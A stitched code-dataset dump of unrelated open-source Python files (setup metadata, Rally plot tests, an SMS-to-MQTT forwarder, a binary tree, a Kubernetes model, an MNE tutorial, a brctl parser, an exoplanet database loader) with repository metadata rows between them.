python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4',
install_requires=['setuptools'],
zip_safe=False,
include_package_data=True,
download_url='https://github.com/dahlia/iterfzf/releases',
keywords='fzf',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console :: Curses',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)', # noqa: E501
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: BSD :: OpenBSD',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Terminals',
]
)
|
gpl-3.0
| 289,778,294,269,218,750 | 34.535503 | 99 | 0.53784 | false |
amit0701/rally
|
tests/unit/task/processing/test_plot.py
|
1
|
6543
|
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import ddt
import mock
from rally.task.processing import plot
from tests.unit import test
PLOT = "rally.task.processing.plot."
@ddt.ddt
class PlotTestCase(test.TestCase):
@mock.patch(PLOT + "charts")
def test__process_scenario(self, mock_charts):
for mock_ins, ret in [
(mock_charts.MainStatsTable, "main_stats"),
(mock_charts.MainStackedAreaChart, "main_stacked"),
(mock_charts.AtomicStackedAreaChart, "atomic_stacked"),
(mock_charts.OutputStackedAreaDeprecatedChart,
"output_stacked"),
(mock_charts.LoadProfileChart, "load_profile"),
(mock_charts.MainHistogramChart, "main_histogram"),
(mock_charts.AtomicHistogramChart, "atomic_histogram"),
(mock_charts.AtomicAvgChart, "atomic_avg")]:
setattr(mock_ins.return_value.render, "return_value", ret)
iterations = [
{"timestamp": i + 2, "error": [],
"duration": i + 5, "idle_duration": i,
"output": {"additive": [], "complete": []},
"atomic_actions": {"foo_action": i + 10}} for i in range(10)]
data = {"iterations": iterations, "sla": [],
"key": {"kw": {"runner": {"type": "constant"}},
"name": "Foo.bar", "pos": 0},
"info": {"atomic": {"foo_action": {"max_duration": 19,
"min_duration": 10}},
"full_duration": 40, "load_duration": 32,
"iterations_count": 10, "iterations_passed": 10,
"max_duration": 14, "min_duration": 5,
"output_names": [],
"tstamp_end": 25, "tstamp_start": 2}}
task_data = plot._process_scenario(data, 1)
self.assertEqual(
task_data, {
"cls": "Foo", "met": "bar", "name": "bar [2]", "pos": "1",
"runner": "constant", "config": json.dumps(
{"Foo.bar": [{"runner": {"type": "constant"}}]},
indent=2),
"full_duration": 40, "load_duration": 32,
"atomic": {"histogram": "atomic_histogram",
"iter": "atomic_stacked", "pie": "atomic_avg"},
"iterations": {"histogram": "main_histogram",
"iter": "main_stacked",
"pie": [("success", 10), ("errors", 0)]},
"iterations_count": 10, "errors": [],
"load_profile": "load_profile",
"additive_output": [],
"complete_output": [[], [], [], [], [], [], [], [], [], []],
"output_errors": [],
"sla": [], "sla_success": True, "table": "main_stats"})
@mock.patch(PLOT + "_process_scenario")
@mock.patch(PLOT + "json.dumps", return_value="json_data")
def test__process_tasks(self, mock_json_dumps, mock__process_scenario):
tasks_results = [{"key": {"name": i, "kw": "kw_" + i}}
for i in ("a", "b", "c", "b")]
mock__process_scenario.side_effect = lambda a, b: (
{"cls": "%s_cls" % a["key"]["name"],
"name": str(b),
"met": "dummy",
"pos": str(b)})
source, tasks = plot._process_tasks(tasks_results)
self.assertEqual(source, "json_data")
mock_json_dumps.assert_called_once_with(
{"a": ["kw_a"], "b": ["kw_b", "kw_b"], "c": ["kw_c"]},
sort_keys=True, indent=2)
self.assertEqual(
tasks,
[{"cls": "a_cls", "met": "dummy", "name": "0", "pos": "0"},
{"cls": "b_cls", "met": "dummy", "name": "0", "pos": "0"},
{"cls": "b_cls", "met": "dummy", "name": "1", "pos": "1"},
{"cls": "c_cls", "met": "dummy", "name": "0", "pos": "0"}])
@ddt.data({},
{"include_libs": True},
{"include_libs": False})
@ddt.unpack
@mock.patch(PLOT + "_process_tasks")
@mock.patch(PLOT + "objects")
@mock.patch(PLOT + "ui_utils.get_template")
@mock.patch(PLOT + "json.dumps", side_effect=lambda s: "json_" + s)
def test_plot(self, mock_dumps, mock_get_template, mock_objects,
mock__process_tasks, **ddt_kwargs):
mock__process_tasks.return_value = "source", "scenarios"
mock_get_template.return_value.render.return_value = "tasks_html"
mock_objects.Task.extend_results.return_value = ["extended_result"]
tasks_results = [
{"key": "foo_key", "sla": "foo_sla", "result": "foo_result",
"full_duration": "foo_full_duration",
"load_duration": "foo_load_duration"}]
html = plot.plot(tasks_results, **ddt_kwargs)
self.assertEqual(html, "tasks_html")
generic_results = [
{"id": None, "created_at": None, "updated_at": None,
"task_uuid": None, "key": "foo_key",
"data": {"raw": "foo_result",
"full_duration": "foo_full_duration",
"sla": "foo_sla",
"load_duration": "foo_load_duration"}}]
mock_objects.Task.extend_results.assert_called_once_with(
generic_results)
mock_get_template.assert_called_once_with("task/report.html")
mock__process_tasks.assert_called_once_with(["extended_result"])
if "include_libs" in ddt_kwargs:
mock_get_template.return_value.render.assert_called_once_with(
data="json_scenarios", source="json_source",
include_libs=ddt_kwargs["include_libs"])
else:
mock_get_template.return_value.render.assert_called_once_with(
data="json_scenarios", source="json_source",
include_libs=False)
|
apache-2.0
| 5,324,407,977,765,640,000 | 46.413043 | 78 | 0.517041 | false |
autostock/RaspiDay
|
day2/SIM-Card/raspberry-code/sim-mqtt.py
|
1
|
1294
|
# forwards SMS messages to an MQTT broker
# SIM module attached to ttyS1
# driven via AT commands
# SMS format: topic:payload
# call initpin() once at startup
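# example (illustrative): an SMS with body "home/light:on" from the allowed
# number publishes payload "on" to MQTT topic "home/light"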
import serial
import time
import paho.mqtt.client as mqtt
port=serial.Serial("/dev/ttyS1",9600)
#port.open()
client=mqtt.Client()
# MQTT broker (placeholder address)
client.connect("x.x.x.x",1883,60)
def initpin():
    # unlock the SIM with its PIN (placeholder "xxxx")
port.write("AT+CPIN=xxxx\r\n")
out=''
time.sleep(0.5)
while port.inWaiting()>0:
out+=port.read(1)
print out
def readmsg1():
port.write("AT+CMGR=1\r\n")
out=''
time.sleep(0.5)
while port.inWaiting()>0:
out+=port.read(1)
if len(out)<7:
print "keine Nachricht."
else:
print out
nrstart=out.find('"+')
nrend=out.find('"',nrstart+1)
nr=out[nrstart+1:nrend]
endline=out.find('\n',2)
mess=out[endline+1:]
endmess=mess.find('\n')-1
mess=mess[:endmess]
        # allowed sender number (placeholder)
        if nr != "xxxxxxxxxxxxxx":
            print "invalid number."
else:
print "Signal erhalten."
# print "Message:"+mess
endtopic=mess.find(':')
topic=mess[:endtopic]
payload=mess[endtopic+1:]
# print "Topic:"+topic
# print "Payload:"+payload
client.publish(topic,payload)
port.write('AT+CMGD=1\r\n')
while(1):
readmsg1()
time.sleep(10)
port.close()
|
gpl-3.0
| -3,823,492,392,637,159,400 | 20.213115 | 44 | 0.637558 | false |
mne-tools/mne-tools.github.io
|
0.15/_downloads/plot_object_evoked.py
|
2
|
3497
|
"""
.. _tut_evoked_objects:
The :class:`Evoked <mne.Evoked>` data structure: evoked/averaged data
=====================================================================
The :class:`Evoked <mne.Evoked>` data structure is mainly used for storing
averaged data over trials. In MNE the evoked objects are usually created by
averaging epochs data with :func:`mne.Epochs.average`.
"""
import os.path as op
import mne
###############################################################################
# Here for convenience we read the evoked dataset from a file.
data_path = mne.datasets.sample.data_path()
fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis-ave.fif')
evokeds = mne.read_evokeds(fname, baseline=(None, 0), proj=True)
print(evokeds)
###############################################################################
# Notice that the reader function returned a list of evoked instances. This is
# because you can store multiple categories into a single file. Here we have
# categories of
# ``['Left Auditory', 'Right Auditory', 'Left Visual', 'Right Visual']``.
# We can also use ``condition`` parameter to read in only one category.
evoked = mne.read_evokeds(fname, condition='Left Auditory')
evoked.apply_baseline((None, 0)).apply_proj()
print(evoked)
###############################################################################
# If you've gone through the tutorials on raw and epochs datasets, you're
# probably already familiar with the :class:`Info <mne.Info>` attribute.
# There is nothing new or special with the ``evoked.info``. All the relevant
# info is still there.
print(evoked.info)
print(evoked.times)
###############################################################################
# The evoked data structure also contains some new attributes easily
# accessible:
print(evoked.nave) # Number of averaged epochs.
print(evoked.first) # First time sample.
print(evoked.last) # Last time sample.
print(evoked.comment) # Comment on dataset. Usually the condition.
print(evoked.kind) # Type of data, either average or standard_error.
###############################################################################
# The data is also easily accessible. Since the evoked data arrays are usually
# much smaller than raw or epochs datasets, they are preloaded into the memory
# when the evoked object is constructed. You can access the data as a numpy
# array.
data = evoked.data
print(data.shape)
###############################################################################
# The data is arranged in an array of shape `(n_channels, n_times)`. Notice
# that unlike epochs, evoked object does not support indexing. This means that
# to access the data of a specific channel you must use the data array
# directly.
print('Data from channel {0}:'.format(evoked.ch_names[10]))
print(data[10])
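###############################################################################
# A small illustrative aside (not part of the original tutorial): the
# ``times`` attribute makes it easy to slice a latency window with NumPy.
# Here we average channel 10 over the 100-200 ms window.
import numpy as np  # assumption: numpy is importable alongside mne
mask = (evoked.times >= 0.1) & (evoked.times <= 0.2)
print(data[10][mask].mean())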
###############################################################################
# If you want to import evoked data from some other system and you have it in a
# numpy array you can use :class:`mne.EvokedArray` for that. All you need is
# the data and some info about the evoked data. For more information, see
# :ref:`tut_creating_data_structures`.
evoked = mne.EvokedArray(data, evoked.info, tmin=evoked.times[0])
evoked.plot()
###############################################################################
# To write an evoked dataset to a file, use the :meth:`mne.Evoked.save` method.
# To save multiple categories to a single file, see :func:`mne.write_evokeds`.
|
bsd-3-clause
| -5,153,579,084,988,538,000 | 45.013158 | 79 | 0.596797 | false |
quaddra/engage-utils
|
engage_utils/test_pkgmgr.py
|
1
|
2787
|
"""Unit tests for pkgmgr
Just import this package into the python repl. We can eventually
convert this to unit tests.
You can also run it from the command line:
python -c "from test_pkgmgr import *"
"""
DRY_RUN=False
import logging
logging.basicConfig(level=logging.DEBUG)
import tempfile
import shutil
from pkgmgr import *
pkgs = []
django_pkg_js = {
"filename": "Django-1.4.10.tar.gz",
"name": "Django",
"version":"1.4",
"pkg_type":"pip",
"package_name": "django==1.4.10",
"license": {"name":"BSD 3-Clause",
"url":"https://github.com/django/django/blob/master/LICENSE"},
"patch_version":"1.4.10",
"md5sum": "d324aecc37ce5430f548653b8b1509b6",
"cksum": "1774032669"
}
django = Package.from_json(django_pkg_js)
pkgs.append(django)
print django.pretty_print()
pip_pkg_js = {
"filename": "pip-1.5.2.tar.gz",
"name": "pip",
"version": "1.5",
"patch_version":"1.5.2",
"pkg_type": "tgz",
"source_url": "https://pypi.python.org/packages/source/p/pip/pip-1.5.2.tar.gz#md5=5da30919f732d68b1c666e484e7676f5",
"md5sum":"5da30919f732d68b1c666e484e7676f5",
"license": {"name":"MIT",
"url":"https://github.com/pypa/pip/blob/develop/LICENSE.txt"}
}
pip = Package.from_json(pip_pkg_js)
pkgs.append(pip)
print pip.pretty_print()
tmpdir = tempfile.mkdtemp()
print "Creating %s for tests" % tmpdir
tmpdir2 = None
try:
print "Initial downloads"
for p in pkgs:
print "Initial download of %s" % p.filename
p.download_from_source(tmpdir, dry_run=DRY_RUN)
print "Will download everything again, should skip all files"
for p in pkgs:
print "Re-download %s" % p.filename
path = p.download([], tmpdir, dry_run=DRY_RUN)
assert os.path.exists(path)
tmpdir2 = tempfile.mkdtemp()
print "Secondary repository at %s" % tmpdir2
repo = 'file:' + tmpdir
print '"Download" from local repository %s' % repo
for p in pkgs:
path = p.download([repo,], tmpdir2, dry_run=DRY_RUN)
assert os.path.exists(path)
# test the gathering of packages
engage_dir = fixpath(os.path.join(os.path.dirname(fixpath(__file__)),
'../../engage'))
if not os.path.exists(engage_dir):
raise Exception("Could not run gather test - no engage directory at %s" % engage_dir)
package_file = os.path.join(tmpdir2, 'packages.json')
print "gathering resource files from %s" % engage_dir
cnt = gather_package_definitions([engage_dir,], package_file)
    assert cnt == 1, "Expecting 1 package, got %d" % cnt
finally:
shutil.rmtree(tmpdir)
print "deleted %s" % tmpdir
if tmpdir2:
shutil.rmtree(tmpdir2)
print "deleted %s" % tmpdir2
print "all tests passed"
|
apache-2.0
| -4,386,750,700,094,869,500 | 30.670455 | 120 | 0.639756 | false |
mbohlool/client-python
|
kubernetes/client/models/v1_glusterfs_volume_source.py
|
1
|
5563
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1GlusterfsVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'endpoints': 'str',
'path': 'str',
'read_only': 'bool'
}
attribute_map = {
'endpoints': 'endpoints',
'path': 'path',
'read_only': 'readOnly'
}
def __init__(self, endpoints=None, path=None, read_only=None):
"""
V1GlusterfsVolumeSource - a model defined in Swagger
"""
self._endpoints = None
self._path = None
self._read_only = None
self.discriminator = None
self.endpoints = endpoints
self.path = path
if read_only is not None:
self.read_only = read_only
@property
def endpoints(self):
"""
Gets the endpoints of this V1GlusterfsVolumeSource.
EndpointsName is the endpoint name that details Glusterfs topology. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:return: The endpoints of this V1GlusterfsVolumeSource.
:rtype: str
"""
return self._endpoints
@endpoints.setter
def endpoints(self, endpoints):
"""
Sets the endpoints of this V1GlusterfsVolumeSource.
EndpointsName is the endpoint name that details Glusterfs topology. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:param endpoints: The endpoints of this V1GlusterfsVolumeSource.
:type: str
"""
if endpoints is None:
raise ValueError("Invalid value for `endpoints`, must not be `None`")
self._endpoints = endpoints
@property
def path(self):
"""
Gets the path of this V1GlusterfsVolumeSource.
Path is the Glusterfs volume path. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:return: The path of this V1GlusterfsVolumeSource.
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""
Sets the path of this V1GlusterfsVolumeSource.
Path is the Glusterfs volume path. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:param path: The path of this V1GlusterfsVolumeSource.
:type: str
"""
if path is None:
raise ValueError("Invalid value for `path`, must not be `None`")
self._path = path
@property
def read_only(self):
"""
Gets the read_only of this V1GlusterfsVolumeSource.
ReadOnly here will force the Glusterfs volume to be mounted with read-only permissions. Defaults to false. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:return: The read_only of this V1GlusterfsVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1GlusterfsVolumeSource.
ReadOnly here will force the Glusterfs volume to be mounted with read-only permissions. Defaults to false. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:param read_only: The read_only of this V1GlusterfsVolumeSource.
:type: bool
"""
self._read_only = read_only
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1GlusterfsVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
apache-2.0
| -5,037,618,386,105,305,000 | 29.233696 | 204 | 0.586015 | false |
MisterTofu/practice
|
datastructures/binary-tree.py
|
1
|
5688
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: Travis A. Ebesu
@created: 2015-02-22
@summary:
'''
# pylint: disable=all
class Node(object):
def __init__(self, key):
self.key = key
self.left = None
self.right = None
self.parent = None
def __str__(self):
return '{0}'.format(self.key)
def __repr__(self):
return 'Key: {0:<5}\tParent: {1:<5}\tLeft: {2:<5}\tRight: {3:<5}'.format(self.key,
self.parent,
self.left,
self.right)
def _search(node, key):
    '''
    Searches the binary tree for a key and returns the node, or None.
    Directs the search left if the key is smaller and right if bigger.
    An iterative search is faster than a recursive one.
    '''
    temp = node
    while temp != None and key != temp.key:
        # Walk down: left subtree holds smaller keys, right holds bigger.
        if key < temp.key:
            temp = temp.left
        else:
            temp = temp.right
    return temp
def _print_helper(root, indent):
'''
@source: http://www.cs.toronto.edu/~rdanek/csc148h_09/lectures/8/bst.py
Print the tree rooted at BTNode root. Print str indent (which
consists only of whitespace) before the root value; indent more for the
subtrees so that it looks nice.'''
    if root is not None:
        _print_helper(root.right, indent + "    ")
        print indent + str(root.key)
        _print_helper(root.left, indent + "    ")
class BinaryTree(object):
def __init__(self):
self.root = None
self.size = 0
def __len__(self):
return self.size
@property
def length(self):
return self.size
def max(self, node=None):
'''
Returns the maximum value in the tree
'''
temp = self.root if node == None else node
while temp.right != None:
temp = temp.right
return temp
def min(self, node=None):
'''
Returns the min value in the tree
'''
temp = self.root if node == None else node
while temp.left != None:
temp = temp.left
return temp
def __transplant(self, u, v):
# Replace U with V
# u is the root
if u.parent == None:
self.root = v
# u is a left child
        elif u is u.parent.left:  # identity check; the parent's left child may be None
u.parent.left = v
# u is a right child
else:
u.parent.right = v
if v != None:
v.parent = u.parent
def __delete_node(self, node):
'''
Deletes a node
'''
# No left element
if node.left == None:
self.__transplant(node, node.right)
# No right element
elif node.right == None:
self.__transplant(node, node.left)
        else:
            # Replace the node with its successor: the minimum of the right
            # subtree (CLRS tree-delete).
            temp = self.min(node.right)
            if temp.parent != node:
                self.__transplant(temp, temp.right)
                temp.right = node.right
                temp.right.parent = temp
            self.__transplant(node, temp)
            temp.left = node.left
            temp.left.parent = temp
def delete(self, key):
'''
Deletes a node given a key
'''
node = self.search(key)
if node != None:
self.__delete_node(node)
self.size -= 1
else:
raise KeyError('No such node exists in tree')
def insert(self, key):
'''
Inserts a node, left if key < parent else right
Left has smaller, right has bigger
'''
self.size += 1
node = Node(key)
cur = None
parent = self.root
while parent is not None:
cur = parent
parent = parent.left if node.key < parent.key else parent.right
node.parent = cur
if cur is None:
self.root = node
elif node.key < cur.key:
cur.left = node
else:
cur.right = node
def search(self, key):
'''
Searches for a given element in the tree
'''
return _search(self.root, key)
def __inorder_tree_walk(self, node):
'''
prints out the elements in order
'''
if node != None:
self.__inorder_tree_walk(node.left)
print node.key
self.__inorder_tree_walk(node.right)
def __str__(self):
'''
Prints the tree out by depth
'''
s = dict()
depth = 0
def recursive(node, depth):
if node != None:
recursive(node.left, depth + 1)
temp = s.get(depth, None)
if temp:
temp.append(node.key)
else:
temp = [node.key]
s[depth] = temp
recursive(node.right, depth + 1)
recursive(self.root, 1)
output = []
for depth in sorted(s.keys()):
layer = ''
for v in s[depth]:
layer += '{0}{1}'.format(' ' * depth, v)
output.append(layer)
return '\n'.join(output)
def print_tree(self):
'''
source = http://www.cs.toronto.edu/~rdanek/csc148h_09/lectures/8/bst.py
Print the tree rooted at root.'''
_print_helper(self.root, "")
if __name__ == '__main__':
print
bt = BinaryTree()
bt.insert(10)
bt.insert(5)
bt.insert(3)
bt.insert(20)
bt.delete(5)
bt.print_tree()
|
gpl-3.0
| -1,501,138,086,404,303,600 | 24.621622 | 90 | 0.483122 | false |
scottrice/Ice
|
ice/gridproviders/consolegrid_provider.py
|
1
|
1816
|
#!/usr/bin/env python
# encoding: utf-8
"""
consolegrid_provider.py
Created by Scott on 2013-12-26.
Copyright (c) 2013 Scott Rice. All rights reserved.
"""
import sys
import os
import urllib
import urllib2
import grid_image_provider
from ice.logs import logger
class ConsoleGridProvider(grid_image_provider.GridImageProvider):
@staticmethod
def api_url():
return "http://consolegrid.com/api/top_picture"
@staticmethod
def is_enabled():
# TODO: Return True/False based on the current network status
return True
def consolegrid_top_picture_url(self, rom):
host = self.api_url()
quoted_name = urllib.quote(rom.name)
return "%s?console=%s&game=%s" % (host, rom.console.shortname, quoted_name)
def find_url_for_rom(self, rom):
"""
Determines a suitable grid image for a given ROM by hitting
ConsoleGrid.com
"""
try:
response = urllib2.urlopen(self.consolegrid_top_picture_url(rom))
if response.getcode() == 204:
name = rom.name
console = rom.console.fullname
logger.debug(
"ConsoleGrid has no game called `%s` for %s" % (name, console)
)
else:
return response.read()
except urllib2.URLError as error:
# Connection was refused. ConsoleGrid may be down, or something bad
# may have happened
logger.debug(
"No image was downloaded due to an error with ConsoleGrid"
)
def download_image(self, url):
"""
Downloads the image at 'url' and returns the path to the image on the
local filesystem
"""
(path, headers) = urllib.urlretrieve(url)
return path
def image_for_rom(self, rom):
image_url = self.find_url_for_rom(rom)
if image_url is None or image_url == "":
return None
return self.download_image(image_url)
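
# Hedged usage sketch (not part of the original module): `rom` stands for an
# object exposing `name` and `console.shortname`, as the methods above expect,
# and the base class is assumed to need no constructor arguments.
#
#   provider = ConsoleGridProvider()
#   grid_path = provider.image_for_rom(rom)  # None if no image was found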
|
mit
| 8,985,641,121,252,052,000 | 25.318841 | 79 | 0.663546 | false |
wcmitchell/insights-core
|
insights/parsers/brctl_show.py
|
1
|
4185
|
"""
BrctlShow - command ``brctl show``
==================================
This module provides processing for the output of the ``brctl show`` command.
Class ``BrctlShow`` parses the output of the ``brctl show`` command.
Sample output of this command looks like::
---
bridge name bridge id STP enabled interfaces
br0 8000.08002731ddfd no eth1
eth2
eth3
br1 8000.0800278cdb62 no eth4
eth5
br2 8000.0800278cdb63 no eth6
docker0 8000.0242d4cf2112 no
---
Examples:
>>> brctl_content = '''
... bridge name bridge id STP enabled interfaces
... br0 8000.08002731ddfd no eth1
... eth2
... eth3
... br1 8000.0800278cdb62 no eth4
... eth5
... br2 8000.0800278cdb63 no eth6
... docker0 8000.0242d4cf2112 no
... '''.strip()
>>> from insights.parsers.brctl_show import BrctlShow
>>> from insights.tests import context_wrap
>>> shared = {BrctlShow: BrctlShow(context_wrap(brctl_content))}
>>> brctl_info = BrctlShow(context_wrap(brctl_content))
>>> brctl_info.data
[
{'interfaces': ['eth1', 'eth2', 'eth3'], 'bridge id': '8000.08002731ddfd',
'STP enabled': 'no', 'bridge name': 'br0'},
{'interfaces': ['eth4', 'eth5'], 'bridge id': '8000.0800278cdb62',
'STP enabled': 'no', 'bridge name': 'br1'},
{'interfaces': ['eth6'], 'bridge id': '8000.0800278cdb63',
'STP enabled': 'no', 'bridge name': 'br2'},
{'bridge id': '8000.0242d4cf2112', 'STP enabled': 'no',
'bridge name': 'docker0'}
]
>>> brctl_info.group_by_iface
{
'docker0': {'STP enabled': 'no', 'bridge id': '8000.0242d4cf2112'},
'br2': {'interfaces': ['eth6'], 'STP enabled': 'no',
'bridge id': '8000.0800278cdb63'},
'br1': {'interfaces': ['eth4', 'eth5'], 'STP enabled': 'no',
'bridge id': '8000.0800278cdb62'},
'br0': {'interfaces': ['eth1', 'eth2', 'eth3'], 'STP enabled': 'no',
'bridge id': '8000.08002731ddfd'}
}
"""
from .. import Parser, parser
from insights.specs import brctl_show
@parser(brctl_show)
class BrctlShow(Parser):
"""
Parse the output of the command "brctl show" to get bridge
interface info table
"""
@property
def group_by_iface(self):
"""
Return a dict, key is the bridge name, the value is a dic with keys: bridge id,
STP enabled and interfaces
"""
return self._group_by_iface
def parse_content(self, content):
self._group_by_iface = {}
self.data = []
if "/usr/sbin/brctl: file not found" in content[0]:
return
elif "\t" in content[0]:
head_line = filter(None, [v.strip() for v in content[0].split('\t')])
else:
head_line = filter(None, [v.strip() for v in content[0].split(' ')])
iface = head_line[3]
for line in content[1:]:
if not line.startswith((' ', '\t')):
iface_lst = []
br_mapping = {}
br_mapping = dict(zip(head_line, line.split()))
if len(line.split()) == 4:
iface_lst.append(line.split()[3])
br_mapping[iface] = iface_lst
if br_mapping:
self.data.append(br_mapping)
else:
iface_lst.append(line.strip())
br_mapping[iface] = iface_lst
for entry in self.data:
self._group_by_iface[entry['bridge name']] = \
dict((k, v) for (k, v) in entry.iteritems() if k != 'bridge name')
return
|
apache-2.0
| -8,888,147,247,464,096,000 | 38.481132 | 87 | 0.474074 | false |
ryanvarley/ExoData
|
exodata/database.py
|
1
|
8247
|
""" Handles database classes including search functions
"""
import re
import xml.etree.ElementTree as ET
import glob
import os.path
import io
import gzip
import requests
from .astroclasses import System, Binary, Star, Planet, Parameters, BinaryParameters, StarParameters, PlanetParameters
compactString = lambda string: string.replace(' ', '').replace('-', '').lower()
class OECDatabase(object):
""" This Class Handles the OEC database including search functions.
"""
def __init__(self, databaseLocation, stream=False):
""" Holds the Open Exoplanet Catalogue database in python
:param databaseLocation: file path to the Open Exoplanet Catalogue systems folder ie
~/git/open-exoplanet-catalogue-atmospheres/systems/
get the catalogue from https://github.com/hannorein/open_exoplanet_catalogue
OR the stream object (used by load_db_from_url)
:param stream: if true treats the databaseLocation as a stream object
"""
self._loadDatabase(databaseLocation, stream)
self._planetSearchDict = self._generatePlanetSearchDict()
self.systemDict = dict((system.name, system) for system in self.systems)
self.binaryDict = dict((binary.name, binary) for binary in self.binaries)
self.starDict = dict((star.name, star) for star in self.stars)
self.planetDict = dict((planet.name, planet) for planet in self.planets)
def __repr__(self):
return 'OECDatabase({} Systems, {} Binaries, {} Stars, {} Planets)'.format(len(self.systems), len(self.binaries),
len(self.stars), len(self.planets))
def searchPlanet(self, name):
""" Searches the database for a planet. Input can be complete ie GJ1214b, alternate name variations or even
just 1214.
:param name: the name of the planet to search
:return: dictionary of results as planetname -> planet object
"""
searchName = compactString(name)
returnDict = {}
for altname, planetObj in self._planetSearchDict.iteritems():
if re.search(searchName, altname):
returnDict[planetObj.name] = planetObj
if returnDict:
if len(returnDict) == 1:
return returnDict.values()[0]
else:
return returnDict.values()
else:
return False
@property
def transitingPlanets(self):
""" Returns a list of transiting planet objects
"""
transitingPlanets = []
for planet in self.planets:
try:
if planet.isTransiting:
transitingPlanets.append(planet)
except KeyError: # No 'discoverymethod' tag - this also filters Solar System planets
pass
return transitingPlanets
def _generatePlanetSearchDict(self):
""" Generates a search dictionary for planets by taking all names and 'flattening' them to the most compact form
(lowercase, no spaces and dashes)
"""
planetNameDict = {}
for planet in self.planets:
name = planet.name
altnames = planet.params['altnames']
altnames.append(name) # as we also want the default name to be searchable
for altname in altnames:
reducedname = compactString(altname)
planetNameDict[reducedname] = planet
return planetNameDict
def _loadDatabase(self, databaseLocation, stream=False):
""" Loads the database from a given file path in the class
:param databaseLocation: the location on disk or the stream object
:param stream: if true treats the databaseLocation as a stream object
"""
# Initialise Database
self.systems = []
self.binaries = []
self.stars = []
self.planets = []
if stream:
tree = ET.parse(databaseLocation)
for system in tree.findall(".//system"):
self._loadSystem(system)
else:
databaseXML = glob.glob(os.path.join(databaseLocation, '*.xml'))
if not len(databaseXML):
raise LoadDataBaseError('could not find the database xml files. Have you given the correct location '
'to the open exoplanet catalogues /systems folder?')
for filename in databaseXML:
try:
with open(filename, 'r') as f:
tree = ET.parse(f)
except ET.ParseError as e: # this is sometimes raised rather than the root.tag system check
raise LoadDataBaseError(e)
root = tree.getroot()
# Process the system
if not root.tag == 'system':
raise LoadDataBaseError('file {0} does not contain a valid system - could be an error with your version'
' of the catalogue'.format(filename))
self._loadSystem(root)
def _loadSystem(self, root):
systemParams = Parameters()
for systemXML in root:
tag = systemXML.tag
text = systemXML.text
attrib = systemXML.attrib
systemParams.addParam(tag, text, attrib)
system = System(systemParams.params)
self.systems.append(system) # Add system to the index
self._loadBinarys(root, system)
self._loadStars(root, system)
def _loadBinarys(self, parentXML, parent):
binarysXML = parentXML.findall("binary")
for binaryXML in binarysXML:
binaryParams = BinaryParameters()
for value in binaryXML:
tag = value.tag
text = value.text
attrib = value.attrib
binaryParams.addParam(tag, text, attrib)
binary = Binary(binaryParams.params)
binary.parent = parent
parent._addChild(binary) # Add star to the system
self._loadBinarys(binaryXML, binary)
self._loadStars(binaryXML, binary)
self._loadPlanets(binaryXML, binary) # Load planets
self.binaries.append(binary) # Add star to the index
def _loadStars(self, parentXML, parent):
starsXML = parentXML.findall("star")
for starXML in starsXML:
starParams = StarParameters()
for value in starXML:
tag = value.tag
text = value.text
attrib = value.attrib
starParams.addParam(tag, text, attrib)
star = Star(starParams.params)
star.parent = parent
parent._addChild(star) # Add star to the system
self._loadPlanets(starXML, star) # Load planets
self.stars.append(star) # Add star to the index
def _loadPlanets(self, parentXML, parent):
planetsXML = parentXML.findall("planet")
for planetXML in planetsXML:
planetParams = PlanetParameters()
for value in planetXML:
tag = value.tag
text = value.text
attrib = value. attrib
planetParams.addParam(tag, text, attrib)
planet = Planet(planetParams.params)
planet.parent = parent
